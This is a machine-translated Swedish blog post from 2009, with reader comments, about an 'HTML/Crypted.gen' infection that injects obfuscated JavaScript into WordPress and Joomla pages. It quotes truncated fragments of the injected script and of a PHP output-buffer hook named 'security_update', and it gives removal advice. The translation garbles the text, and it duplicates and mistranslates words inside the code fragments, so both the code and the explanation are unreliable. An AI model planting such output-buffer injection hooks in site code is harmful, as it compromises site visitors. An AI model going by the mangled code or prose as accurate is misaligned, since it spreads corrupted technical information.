imaginepaolo, bild har ingen vägg

Crypted.gen attacker WordPress och Joomla

HTML / Crypted.gen attacker WordPress och Joomla

Kommenterade den 12 november 2009 7 (11.673 visningar)

Kategoriseras under: Nyheter

Intressant förklaring till attacken tas imaginepaolo http://www.settorezero.com/ :

Det händer oftare nyligen, att många webbplatser baserat på WordPress och Joomla, angrips på något sätt av den trojanska rapporterats av Avira som "HTML / Crypted.gen". Jag kunde inte säga om det är ett problem med buggar som finns i dessa två publiceringssystem (men jag tvivlar på det) eller snarare av ett virus som attackerade de servrar som är värdar för dessa platser.
Den senare hypotesen jag fick stöd av det faktum att alla de människor jag kontaktade och som har haft samma problem, de alla på samma webbhotell. Flytta inte ens avgifter för nu eftersom det är ganska ovanligt och jag har inte hittat tillfredsställande information nätverket för att göra en giltig antagande, så mina är bara antaganden och bör ses som sådan.
Under tiden hoppas jag detta inlägg kan vara till hjälp och diskuteras för att förstå var problemet kommer ifrån.
Först och främst vill säga att viruset förändrar sidor (men inte alltid alla sidor på webbplatsen) med tillägg HTML, PHP, ASP och JS, lägga till en krypterad javascript-kod som börjar mer eller mindre så här:
  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Language = "javascript"> $ a = \ "Z64dZ3dZ22q | Om | qdu] qwys ^ e}} rub8tqiZ3c0 
Jag säger "mer eller mindre" eftersom alla inte ser ut på samma sätt, dock är det lätt att identifiera skadlig kod eftersom, som vi ser, är något skymd: nyckelorden inte läsa utan bara teckensekvenser verkar absurt.
När det gäller WordPress, är dock skadlig kod brukar läggas på varje sida "index.php" och börjar så här:
  1 
  ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <Php ob_start ("security_update");? Funktion security_update ($ buffert) {. Return $ buffert "<script Language= \" JavaScript \"> $ a = \" Z64dZ3dZ22q | Om | qdu] qwys ^ och} 
Det verkar som om manuset inte orsakar skador och det är bara upptäcks av Avira (Ask). Problemet är löst genom att eliminera de skadliga effekterna av manus sidor eller laddar en frisk kopia av sidorna på servern.
Vissa användare, dock efter att få ett virus, fann de en kopia av sajten (eller andra webbsidor) som lagras på din dator med detta problem, då attacken verkar vara "lokalt" och inte fjärrkontrollen: sidorna verkar vara fäst på samma dator där de bor. Detta får mig att tro att det är ett allt större problem värd: i själva verket många har på din dator en kopia av det smittade området, och har funnits på servern skriptet sidor.
Lösningen för att kunna skydda dig alltid ha en aktuell säkerhetskopia av din webbplats på datorn och beställ din webbplats om vi inte har lämnats.
Jag citerar här några användbara länkar (mestadels på WordPress) i samband med den presenterade problemet:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://www.wordpress-it.it/forum/topic/12452
WordPress 2.8.5; Över 100 hackerattacker på Aruba

Liknande inlägg

Inga Relaterade inlägg

Meddelande

7 Responses to "HTML / Crypted.gen attacker WordPress och Joomla"

Prodi och drömmar om italienska invandrare i Spanien. "Uppsåtligt skadlig", nätverket säger:
December 10, 2009 kl 14:01
[...] HOT Bland - Det verkar i själva verket är det nästan omedelbart upptäcks ett hot bara för att Avira höger (och [...]
Imperfect Mamma skriver:
23 Januari 2010 kl 22:31
Hänt mig två gånger i 20 dagar. :-D
Arianna skrev:
25 jan 2010 kl 16:02
Det hände mig en liknande attack (minns inte om koden var densamma) i november förra året.
Jag hittade och tog bort den skadliga koden antivirus plugin med WordPress. Men jag gjorde vad jag hade läst var det bästa att göra: Jag installerade om allt från tema plugins, jag också bytt webbadress och lösenord. Sedan dess, och nu, allt är bra ... men jag säger tyst.
Hej!
Valentina skrev:
9 mars 2010 kl 16:21
Jag försöker leta efter rader av kod som du har gett, men ändå ingenting. Jag laddade ner hela min blogg förutom den gemensamma mappen och mdb-databas.
VOL osäkra ?!... - Sidan 2 - Vespaonline skriver:
18 mars 2010 kl 20:22
Hej hej Turbo [...] Prova att leta på Joomla forum, andra har samma problem. HTML / Crypted.gen attacker WordPress och Joomla | Webbdesign [+ fråga LÖST] html / crypted.gen HTML / Crypted.gen attacker WordPress och Joomla | Industri [...]
Louis skriver:
20 Mars 2010 kl 19:38
Tack!
Jag löste problemet genom att ta bort skriptet.
Han var nominerad i hela indexet sidor, även de index_1. index_old, kopior av gamla förändringar.
Tack igen ... jag är skyldig dig en tjänst
Neuville skriver:
28 juli, 2010 kl 23:38
Hej,
Samma sak hände mig, är inte första gången i Aruba (leverantören), men det var 7 eller 8 gånger: börjar tro att det är riktade attacker för att sälja anti-virus tjänsten är frivillig och betalas: Självklart leverantörer kommer att förändras med ljusets hastighet.
Mina misstankar är helt motiverat, även för det faktum att sedan den senaste attacken har jag begränsat antalet plugins aktiverade (alla "certifierade" och laddas ner från wp.org) och jag byggde själva mallen ... på denna punkt, eftersom problemet har hittills bara fokuserat på webbplatser som värd Aruba jag har all anledning att tvivla på sommaren ... synd, men om jag kan under helgen köpte jag en annan värd. Om du har några tips är välkomna
Jag tror inte att detta är en sårbarhet i WordPress, jag har version 2.9.2, vilket gick bra ett tag "och är stabil (i själva verket jag inte uppgradera till 3 av rädsla för attacker)